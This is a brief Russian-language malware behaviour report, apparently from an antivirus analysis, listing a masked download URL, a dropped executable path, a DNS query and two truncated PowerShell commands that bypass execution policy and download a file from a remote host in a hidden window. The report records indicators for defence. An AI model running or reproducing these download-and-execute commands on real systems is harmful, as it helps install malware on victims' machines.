Техническая информация
- http://ao######.###ernpressurecookerrecipes.com/dnoces/tpmetta/eztrxytcfvgubhki.php как %localappdata%\tempefgjasd.exe
- DNS ASK ao######.###ernpressurecookerrecipes.com
- '<SYSTEM32>\cmd.exe' /c PowerShell -NoExit -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://ao######.###ernpressurecookerrecipes.com/dnoces/tpmetta/eztrxytcfvgubhki.php','%L...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c PowerShell -NoExit -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://ao######.###ernpressurecookerrecipes.com/dnoces/tpmetta/eztrxytcfvgubhki.php','%L...